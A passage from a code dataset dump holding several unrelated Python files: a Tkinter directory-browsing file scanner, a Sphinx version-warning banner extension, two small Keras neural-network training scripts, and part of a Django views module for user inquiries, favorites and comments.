y_scrollbar=TkinterWrapper.WindowScrollbar(self.listbox_frame.get_frame(),\"y\")\r\n y_scrollbar.attach_to_widget(super(DirectoryListbox, self).get_listbox())\r\n super(DirectoryListbox, self).attach_scrollbar(\"y\",y_scrollbar.get_scrollbar())\r\n y_scrollbar.pack_scrollbar(\"left\",0,0)\r\n\r\n def __setup_error_frame(self):\r\n self.error_frame=TkinterWrapper.WindowFrame(self.frame)\r\n self.error_frame.pack_frame(\"top\",0,0)\r\n\r\n def insert_harddrives(self):\r\n super(DirectoryListbox, self).delete_text(0,\"end\")\r\n for harddrive in self.computer_directory.get_harddrives():\r\n print(harddrive)\r\n super(DirectoryListbox, self).insert_text(\"{0} {1}\\n\".format(RIGHT_TRIANGLE,harddrive),\"end\")\r\n\r\n def start_checking_for_selection(self):\r\n self.selections[0]=super(DirectoryListbox, self).get_current_selection()\r\n self.selections[0]=super(DirectoryListbox, self).get_text_from_index(self.selections[0])\r\n if self.selections[0]!=self.selections[1] and self.selections[0] is not None:\r\n print(\"Selection changed to: {0}\".format(self.selections[0]))\r\n self.selection_actions()\r\n self.selections[1]=self.selections[0]\r\n self.frame.after(250,self.start_checking_for_selection)\r\n\r\n def selection_actions(self):\r\n if RIGHT_TRIANGLE in self.selections[0]:\r\n self.go_to_subdirectory()\r\n elif LEFT_TRIANGLE in self.selections[0]:\r\n self.go_up_directory()\r\n\r\n def go_to_subdirectory(self):\r\n self.computer_directory.set_current_directory(self.get_rid_of_arrows_in_directory(self.selections[0]))\r\n subdirectories=self.computer_directory.get_sub_directories()\r\n if subdirectories!=\"ACCESS DENIED\":\r\n self.update_directory_entry()\r\n self.add_directional_information()\r\n for subdirectory in subdirectories:\r\n super(DirectoryListbox, self).insert_text(\" {0} {1}\\n\".format(RIGHT_TRIANGLE,subdirectory),\"end\")\r\n else:\r\n 
error_message=UserErrorMessage.UserErrorMessage(self.error_frame.get_frame(),\"Access to file was denied.\")\r\n self.go_up_directory()\r\n print(\"Access to file denied\")\r\n\r\n def add_directional_information(self):\r\n super(DirectoryListbox, self).delete_text(0,\"end\")\r\n super(DirectoryListbox, self).insert_text(\"{0} Back to {1}\\n\".format(LEFT_TRIANGLE,self.computer_directory.get_previous_directory()),\"end\")\r\n super(DirectoryListbox, self).insert_text(\"{0} {1}\\n\".format(DOWN_TRIANGLE,self.computer_directory.get_current_directory()),\"end\")\r\n\r\n def get_rid_of_arrows_in_directory(self,directory):\r\n # skip the leading triangle markers and padding to recover the real directory name\r\n for x in range(0,len(directory)):\r\n if directory[x] not in (RIGHT_TRIANGLE,DOWN_TRIANGLE,LEFT_TRIANGLE,\" \"):\r\n directory=directory[x:]\r\n break\r\n return directory\r\n\r\n def go_up_directory(self):\r\n self.computer_directory.trim_from_current_directory(1)\r\n self.update_directory_entry()\r\n new_directories=self.computer_directory.get_sub_directories()\r\n if new_directories!=self.computer_directory.get_harddrives():\r\n self.add_directional_information()\r\n else:\r\n super(DirectoryListbox, self).delete_text(0,\"end\")\r\n for new_directory in new_directories:\r\n super(DirectoryListbox, self).insert_text(\" {0} {1}\\n\".format(RIGHT_TRIANGLE,new_directory),\"end\")\r\n\r\n def update_directory_entry(self):\r\n self.current_directory_entry.configure_entry_text(self.computer_directory.get_formated_current_directory())\r\n \r\n \r\nclass ComputerDirectory(object):\r\n def __init__(self):\r\n self.harddrives=[]\r\n self.current_directory=[]\r\n self.formated_current_directory=\"\"\r\n self.find_harddrives()\r\n\r\n def find_harddrives(self):\r\n self.harddrives=[\"{0}:\".format(drive) for drive in ALAPHABET if os.path.exists(\"{0}:\\\\\".format(drive))]\r\n def get_harddrives(self):\r\n return self.harddrives\r\n\r\n def set_current_directory(self, directory):\r\n self.current_directory.append(\"{0}\\\\\".format(directory))\r\n self.set_formated_current_directory()\r\n print(\"Current Dir: \",self.current_directory)\r\n\r\n def get_current_directory(self):\r\n return self.current_directory[len(self.current_directory)-1]\r\n def get_previous_directory(self):\r\n if len(self.current_directory)==1:\r\n return \"Hard drives\"\r\n else:\r\n return self.current_directory[(len(self.current_directory)-1)-1]\r\n\r\n def trim_from_current_directory(self,number_of_levels):\r\n self.delete_last_directories(number_of_levels)\r\n self.set_formated_current_directory()\r\n print(\"Current Dir: \",self.current_directory)\r\n\r\n def delete_last_directories(self,number_of_levels):\r\n for x in range(0,len(self.current_directory)):\r\n if len(self.current_directory)-x<=number_of_levels:\r\n del(self.current_directory[x])\r\n break\r\n print(self.current_directory)\r\n\r\n def get_sub_directories(self):\r\n if len(self.current_directory)==0:\r\n return self.harddrives\r\n else:\r\n try:\r\n os.listdir(self.formated_current_directory)\r\n except OSError:\r\n print(\"Error opening file\")\r\n return \"ACCESS DENIED\"\r\n else:\r\n sub_directories=[sub_dir for sub_dir in os.listdir(self.formated_current_directory) if os.path.isdir(os.path.join(self.formated_current_directory, sub_dir))]\r\n print(sub_directories)\r\n return sub_directories\r\n \r\n def set_formated_current_directory(self):\r\n self.formated_current_directory=\"\"\r\n for x in range(0,len(self.current_directory)):\r\n 
self.formated_current_directory=\"{0}{1}\".format(self.formated_current_directory,self.current_directory[x])\r\n print(\"Formated Cur Dir: \"+self.formated_current_directory)\r\n def get_formated_current_directory(self):\r\n return self.formated_current_directory\r\n\r\n\r\nclass SavedInfo(object):\r\n def __init__(self):\r\n self.known_good_file=FileWrapper.File(os.curdir,\"KnownGoodFiletypes.txt\")\r\n self.known_bad_file=FileWrapper.File(os.curdir,\"KnownBadFiletypes.txt\")\r\n self.__setup_filetypes()\r\n self.directory_to_scan=\"\"\r\n\r\n def __setup_filetypes(self):\r\n self.known_good_filetypes=self.known_good_file.read_lines(0,'end')\r\n self.known_bad_filetypes=self.known_bad_file.read_lines(0,'end')\r\n\r\n def get_known_good_filetypes(self):\r\n good_file_types=self.known_good_filetypes\r\n return good_file_types[0:len(good_file_types)]\r\n def get_known_bad_filetypes(self):\r\n bad_file_types=self.known_bad_filetypes\r\n return bad_file_types[0:len(bad_file_types)]\r\n\r\n def add_file_type(self,file_consensus,file_type):\r\n if file_consensus==\"KnownGood\":\r\n self.known_good_filetypes.append(file_type)\r\n elif file_consensus==\"KnownBad\":\r\n self.known_bad_filetypes.append(file_type)\r\n def delete_file_type(self,file_consensus,file_type):\r\n if file_consensus==\"KnownGood\":\r\n file_list=self.known_good_filetypes\r\n elif file_consensus==\"KnownBad\":\r\n file_list=self.known_bad_filetypes\r\n for x in range(0,len(file_list)):\r\n if file_list[x]==file_type:\r\n del(file_list[x])\r\n break\r\n \r\n def set_directory_to_scan(self,new_directory):\r\n self.directory_to_scan=new_directory\r\n def get_directory_to_scan(self):\r\n return self.directory_to_scan\r\n\r\n def save_info_to_file(self):\r\n self.known_good_file.delete_all_file_contents()\r\n self.known_bad_file.delete_all_file_contents()\r\n for item in self.known_good_filetypes:\r\n self.known_good_file.append_line_to_file(item)\r\n for item in self.known_bad_filetypes:\r\n self.known_bad_file.append_line_to_file(item)\r\n\r\n def close_all_files(self):\r\n self.known_good_file.close_file()\r\n self.known_bad_file.close_file()\r\n\r\n\r\n\r\ndef main():\r\n application_window=AppWindow()\r\n print(\"here\")\r\n saved_information.save_info_to_file()\r\n saved_information.close_all_files()\r\nsaved_information=SavedInfo()\r\nmain()\r\n", "sub_path": "FileScanner.pyw", "file_name": "FileScanner.pyw", "file_ext": "pyw", "file_size_in_byte": 42493, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "TkinterWrapper.Window", "line_number": 40, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowMenu", "line_number": 53, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowMenuCascade", "line_number": 54, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowMenuCascade", "line_number": 56, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 57, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 58, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 63, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 64, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 65, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 89, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowButton", "line_number": 94, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", 
"line_number": 98, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 101, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 138, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 139, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 140, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 162, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 167, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 174, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowListbox", "line_number": 176, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowScrollbar", "line_number": 179, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 186, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowScrollbar", "line_number": 188, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 205, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 209, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 210, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 215, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 217, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowEntry", "line_number": 219, "usage_type": "call"}, {"api_name": "os.startfile", "line_number": 340, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowCanvas", "line_number": 343, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 403, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 412, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 418, "usage_type": "call"}, {"api_name": "os.path", "line_number": 418, "usage_type": "attribute"}, {"api_name": "TkinterWrapper.DialogBox", "line_number": 485, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 507, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 508, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 509, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 510, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowListbox", "line_number": 517, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowScrollbar", "line_number": 520, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 530, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 534, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowEntry", "line_number": 536, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 542, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 546, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowButton", "line_number": 551, "usage_type": "call"}, {"api_name": "UserErrorMessage.UserErrorMessage", "line_number": 562, "usage_type": "call"}, {"api_name": "UserErrorMessage.UserErrorMessage", "line_number": 576, "usage_type": "call"}, {"api_name": "TkinterWrapper.DialogBox", "line_number": 593, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 607, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 608, "usage_type": "call"}, {"api_name": 
"TkinterWrapper.WindowFrame", "line_number": 609, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 615, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 625, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowLabel", "line_number": 627, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowEntry", "line_number": 630, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowScrollbar", "line_number": 633, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 639, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowButton", "line_number": 644, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowListbox", "line_number": 656, "usage_type": "attribute"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 668, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowScrollbar", "line_number": 675, "usage_type": "call"}, {"api_name": "TkinterWrapper.WindowFrame", "line_number": 681, "usage_type": "call"}, {"api_name": "UserErrorMessage.UserErrorMessage", "line_number": 714, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 754, "usage_type": "call"}, {"api_name": "os.path", "line_number": 754, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 788, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 793, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 793, "usage_type": "call"}, {"api_name": "os.path", "line_number": 793, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 793, "usage_type": "call"}, {"api_name": "FileWrapper.File", "line_number": 808, "usage_type": "call"}, {"api_name": "os.curdir", "line_number": 808, "usage_type": "attribute"}, {"api_name": "FileWrapper.File", "line_number": 809, "usage_type": "call"}, {"api_name": "os.curdir", "line_number": 809, "usage_type": "attribute"}]} +{"seq_id": "151057337", "text": "# -*- coding: utf-8 -*-\n\nfrom docutils import nodes, core\nfrom munch import Munch\nimport os\n\nfrom .readthedocs import ReadTheDocsAPI\n\nUSE_READTHEDOCS_API = os.environ.get('USE_READTHEDOCS_API', False)\n\n\nclass VersionWarningBanner(object):\n\n ADMONITION_TYPES = {\n 'warning': nodes.warning,\n 'note': nodes.note,\n 'admonition': nodes.admonition,\n }\n\n def __init__(self, app, doctree):\n self.app = app\n self.doctree = doctree\n self.api = self._get_api()\n\n def get_banner_node(self):\n current_version_slug = self._current_doc_version_slug\n newest_version = self._latest_doc_version\n message = self._get_message(current_version_slug)\n banner = self._create_banner_node(message, newest_version)\n return banner\n\n def _get_api(self):\n if USE_READTHEDOCS_API:\n return ReadTheDocsAPI(self._project_slug)\n\n def _create_banner_node(self, message, newest_version, admonition_type='warning'):\n \"\"\"\n Return an admonition node to be inserted in the document.\n\n :rtype: docutils.nodes.admonition\n \"\"\"\n\n if (\n (\n (USE_READTHEDOCS_API and self.api.is_highest_version(self._current_doc_version_slug)) or\n newest_version.slug == self._current_doc_version_slug\n ) and self._current_doc_version_slug not in self.app.config.versionwarning_messages\n ):\n return None\n\n node_class = self.ADMONITION_TYPES.get(\n admonition_type,\n self.ADMONITION_TYPES.get(self._default_admonition_type),\n )\n\n if self._message_placeholder in message:\n message = message.replace(self._message_placeholder, '`{text} `_'.format(\n text=newest_version.slug,\n 
url=newest_version.url,\n ))\n paragraph = core.publish_doctree(message)[0]\n\n banner_node = node_class(ids=[self._banner_id_div])\n banner_node.append(paragraph)\n return banner_node\n\n @property\n def _banner_id_div(self):\n return self.app.config.versionwarning_banner_id_div\n\n @property\n def _project_slug(self):\n return self.app.config.versionwarning_project_slug\n\n @property\n def _message_placeholder(self):\n return self.app.config.versionwarning_message_placeholder\n\n @property\n def _default_admonition_type(self):\n return self.app.config.versionwarning_default_admonition_type\n\n @property\n def _current_doc_version_slug(self):\n return (\n os.environ.get('READTHEDOCS_VERSION', None) or\n self.app.config.versionwarning_project_version or\n self.app.config.version\n )\n\n @property\n def _latest_doc_version(self):\n if USE_READTHEDOCS_API:\n return self.api.newest_version()\n else:\n return Munch(\n url='.',\n slug=self._current_doc_version_slug,\n )\n\n def _get_message(self, version):\n return self.app.config.versionwarning_messages.get(\n version,\n self.app.config.versionwarning_default_message,\n )\n", "sub_path": "versionwarning/banner.py", "file_name": "banner.py", "file_ext": "py", "file_size_in_byte": 3171, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.environ.get", "line_number": 9, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "docutils.nodes.warning", "line_number": 15, "usage_type": "attribute"}, {"api_name": "docutils.nodes", "line_number": 15, "usage_type": "name"}, {"api_name": "docutils.nodes.note", "line_number": 16, "usage_type": "attribute"}, {"api_name": "docutils.nodes", "line_number": 16, "usage_type": "name"}, {"api_name": "docutils.nodes.admonition", "line_number": 17, "usage_type": "attribute"}, {"api_name": "docutils.nodes", "line_number": 17, "usage_type": "name"}, {"api_name": "readthedocs.ReadTheDocsAPI", "line_number": 34, "usage_type": "call"}, {"api_name": "docutils.core.publish_doctree", "line_number": 61, "usage_type": "call"}, {"api_name": "docutils.core", "line_number": 61, "usage_type": "name"}, {"api_name": "os.environ.get", "line_number": 86, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 86, "usage_type": "attribute"}, {"api_name": "munch.Munch", "line_number": 96, "usage_type": "call"}]} +{"seq_id": "464543904", "text": "# -*- coding: utf-8 -*-\nfrom re import split\nimport numpy as np\nfrom numpy.lib import index_tricks\nfrom numpy.lib.financial import rate\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras.models import Sequential, model_from_json\nfrom tensorflow.keras.layers import Dense, Dropout\nfrom tensorflow.keras.optimizers import RMSprop\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.keras.utils import to_categorical\nimport matplotlib.pyplot as plt\nimport os\nimport pandas as pd\nimport pickle\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.python.keras.backend import binary_crossentropy\nfrom tensorflow.python.keras.callbacks import History\nfrom tensorflow.python.keras.engine import input_layer\nfrom tensorflow.python.keras.layers.core import Flatten\nfrom sklearn import preprocessing\nos.chdir('Mycode/sotuken')\n\ndef data_shuffle(all): \n train,test = train_test_split(all,test_size=0.3)\n return train,test\n\nall = pd.read_csv(\"seikika2.csv\")\ntrain,test= data_shuffle(all)\n\nprint(train)\n'''\ndef 
highscore_tr():\r\n train = pd.read_csv(\"train90_1.csv\")\r\n return train\r\ntrain = highscore_tr()\r\n'''\r\ntrainexp = train[[\"mode\",\"realTemp\",\"realHumi\",\"setVol\"]].values\r\ntrainpur = train[[\"very comfortable(0)\",\"little comfortable(1)\",\"neither(2)\",\"little discomfort(3)\",\"veriy discomfort(4)\"]].values\r\nprint(trainexp)\r\n'Normalize trainexp'\r\n#trainexp = print(preprocessing.minmax_scale(trainexp,axis=1))\r\n#trainexp.to_csv(\"seikika.csv\")\r\n\r\n\r\n'Build the model'\r\nmodel = Sequential([\r\nDense(50,activation=\"relu\",input_shape=(4,)),\r\nDense(20,activation='relu'),\r\nDense(5,activation=\"softmax\")\r\n])\r\nmodel.summary() # model details\r\nadam = optimizers.Adam(lr=0.003)\r\nmodel.compile(optimizer=adam,\r\n loss='categorical_crossentropy',\r\n metrics=['accuracy'],\r\n )\r\n'Run training'\r\nhistory = model.fit(trainexp,\r\n trainpur,\r\n batch_size=100,\r\n epochs=100\r\n )\r\n\r\n'Predict'\r\ntest_exp = test[[\"mode\",\"realTemp\",\"realHumi\",\"setVol\"]].values\r\ntestpur = test[[\"very comfortable(0)\",\"little comfortable(1)\",\"neither(2)\",\"little discomfort(3)\",\"veriy discomfort(4)\"]].values\r\n\r\npre = model.predict(test_exp)\r\n#preclass = model.predict_classes(test_exp)\r\nprint(pre)\r\nprint(testpur)\r\n\r\n\r\nprint(history.history.keys()) # check the keys stored in history\r\n\r\n'Learning curve'\r\ndef learn_plotting(): \r\n plt.title(\"loss and accuracy\")\r\n plt.scatter(x=0,y=0,label=\"loss\")\r\n plt.scatter(x=0,y=0,label=\"accuracy\")\r\n plt.legend()\r\n plt.xlabel(\"epochs\")\r\n plt.ylabel(\"accuracy\")\r\n plt.ylabel(\"loss\")\r\n plt.plot(history.history[\"loss\"])\r\n plt.plot(history.history[\"accuracy\"])\r\n plt.show()\r\n\r\nlearn_plotting()\r\n\r\n", "sub_path": "Mycode/sotuken/sotuken03.py", "file_name": "sotuken03.py", "file_ext": "py", "file_size_in_byte": 2725, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.chdir", "line_number": 22, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 49, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.ylabel", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}]} +{"seq_id": "471240300", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 20 17:52:02 2018\n\n@author: ashwin bhatt\n\"\"\"\n\nfrom __future__ import print_function\nimport keras\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation\nfrom keras.layers.recurrent import LSTM\nfrom keras import backend as K\nfrom keras import optimizers\n\n\n\n\n# the data, split between train and test sets\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\nn_classes = 10\nn_classes = 10\nx_train = x_train.astype('float32')\nx_test = x_test.astype('float32')\nprint('x_train shape:', x_train.shape)\nprint(x_train.shape[0], 'train samples')\nprint(x_test.shape[0], 'test samples')\n\nx_train = x_train.reshape(-1,28,28)\nx_test = x_test.reshape(-1,28,28)\n\n# convert class vectors to binary class matrices\ny_train = keras.utils.to_categorical(y_train, n_classes)\ny_test = keras.utils.to_categorical(y_test, n_classes)\n\n#create rnn model\nmodel = Sequential()\nmodel.add(LSTM(units = 16,activation='relu',input_shape=(28,28)))\nmodel.add(Dense(n_classes))\nmodel.add(Activation('softmax'))\n\nmodel.compile(loss='categorical_crossentropy',\n optimizer=keras.optimizers.RMSprop(lr=0.01),\n metrics=['accuracy'])\n\n\nmodel.summary\n\nmodel.fit(x_train,y_train,\n batch_size=100,epochs=20)\n\n\nscore = model.evaluate(x_test,y_test)\nprint('\\nTest loss:',score[0])\nprint('test accuracy:',score[1])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "sub_path": "keras lstm.py", "file_name": "keras lstm.py", "file_ext": "py", "file_size_in_byte": 1433, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "keras.datasets.mnist.load_data", "line_number": 21, "usage_type": "call"}, {"api_name": "keras.datasets.mnist", "line_number": 21, "usage_type": "name"}, {"api_name": "keras.utils.to_categorical", "line_number": 34, "usage_type": "call"}, {"api_name": "keras.utils", "line_number": 34, "usage_type": "attribute"}, {"api_name": "keras.utils.to_categorical", "line_number": 35, "usage_type": "call"}, {"api_name": "keras.utils", "line_number": 35, "usage_type": "attribute"}, {"api_name": "keras.models.Sequential", "line_number": 38, "usage_type": "call"}, {"api_name": "keras.layers.recurrent.LSTM", "line_number": 39, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 40, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 41, "usage_type": "call"}, {"api_name": "keras.optimizers.RMSprop", "line_number": 44, "usage_type": "call"}, {"api_name": "keras.optimizers", "line_number": 44, "usage_type": "attribute"}]} +{"seq_id": "536342751", "text": "from django.shortcuts import render\nfrom .forms import UserAskForm, UserCommentForm\nfrom django.http import JsonResponse\nfrom .models import UserLove, UserComment\nfrom orgs.models 
import OrgInfo, TeacherInfo\r\nfrom courses.models import CourseInfo\r\nfrom django.core.serializers import serialize\r\nfrom tools.decorators import login_decorator\r\n\r\n\r\n# Create your views here.\r\ndef user_ask(request):\r\n user_ask_form = UserAskForm(request.POST)\r\n if user_ask_form.is_valid():\r\n user_ask_form.save(commit=True)\r\n # name = user_ask_form.cleaned_data['name']\r\n # phone = user_ask_form.cleaned_data['phone']\r\n # course = user_ask_form.cleaned_data['course']\r\n # a = UserAsk()\r\n # a.name = name\r\n # a.phone = phone\r\n # a.course = course\r\n # a.save()\r\n return JsonResponse({'status': 'ok', 'msg': 'Inquiry submitted'})\r\n else:\r\n return JsonResponse({'status': 'fail', 'msg': 'Inquiry failed'})\r\n\r\n\r\n@login_decorator\r\ndef user_love(request):\r\n loveid = request.GET.get('loveid', '')\r\n lovetype = request.GET.get('lovetype', '')\r\n if loveid and lovetype:\r\n # Use the favorite type passed in to decide which model the object belongs to, and the favorite id to locate the exact object.\r\n obj = None\r\n if int(lovetype) == 1:\r\n obj = OrgInfo.objects.filter(id=int(loveid))[0]\r\n if int(lovetype) == 2:\r\n obj = CourseInfo.objects.filter(id=int(loveid))[0]\r\n if int(lovetype) == 3:\r\n obj = TeacherInfo.objects.filter(id=int(loveid))[0]\r\n\r\n # If both the favorite id and type are present, first check the favorites table for an existing record by this user.\r\n love = UserLove.objects.filter(love_id=int(loveid), love_type=int(lovetype), love_man=request.user)\r\n if love:\r\n # A record already exists, so check its status: if True, the item is currently favorited, the page shows \"unfavorite\", and this click is meant to unfavorite it.\r\n if love[0].love_status:\r\n love[0].love_status = False\r\n love[0].save()\r\n obj.love_num -= 1\r\n obj.save()\r\n return JsonResponse({'status': 'ok', 'msg': 'Favorite'})\r\n # If the status is False, the item was favorited and then unfavorited, the page shows \"favorite\", and this click is meant to favorite it again.\r\n else:\r\n love[0].love_status = True\r\n love[0].save()\r\n obj.love_num += 1\r\n obj.save()\r\n return JsonResponse({'status': 'ok', 'msg': 'Unfavorite'})\r\n else:\r\n # The item has never been favorited, so no record exists in the table yet; create the record first, then set its status to True.\r\n a = UserLove()\r\n a.love_man = request.user\r\n a.love_id = int(loveid)\r\n a.love_type = int(lovetype)\r\n a.love_status = True\r\n a.save()\r\n obj.love_num += 1\r\n obj.save()\r\n return JsonResponse({'status': 'ok', 'msg': 'Unfavorite'})\r\n else:\r\n return JsonResponse({'status': 'fail', 'msg': 'Favorite failed'})\r\n\r\n\r\ndef user_comment(request):\r\n user_comment_form = UserCommentForm(request.POST)\r\n if user_comment_form.is_valid():\r\n course = user_comment_form.cleaned_data['course']\r\n content = user_comment_form.cleaned_data['content']\r\n a = UserComment()\r\n a.comment_man = request.user\r\n a.comment_content = content\r\n a.comment_course_id = course\r\n a.save()\r\n\r\n # all_comments = UserComment.objects.filter(comment_course_id=course)\r\n #\r\n # all_comments = serialize('json',all_comments)\r\n #\r\n # return JsonResponse(all_comments,safe=False)\r\n return JsonResponse({'status': 'ok', 'msg': 'Comment posted'})\r\n else:\r\n return JsonResponse({'status': 'fail', 'msg': 'Comment failed'})\r\n\r\n\r\ndef user_deletelove(request):\r\n loveid = request.GET.get('loveid', '')\r\n lovetype = request.GET.get('lovetype', '')\r\n if loveid and lovetype:\r\n love = UserLove.objects.filter(love_id=int(loveid), love_type=int(lovetype), love_man=request.user,\r\n love_status=True)\r\n if love:\r\n love[0].love_status = False\r\n love[0].save()\r\n return JsonResponse({'status': 'ok', 'msg': 'Unfavorite successful'})\r\n else:\r\n return JsonResponse({'status': 'fail', 'msg': 'Unfavorite failed'})\r\n else:\r\n return JsonResponse({'status': 'fail', 'msg': 'Unfavorite failed'})\r\n", "sub_path": "GuLiEdu/apps/operations/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4718, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "forms.UserAskForm", "line_number": 13, 
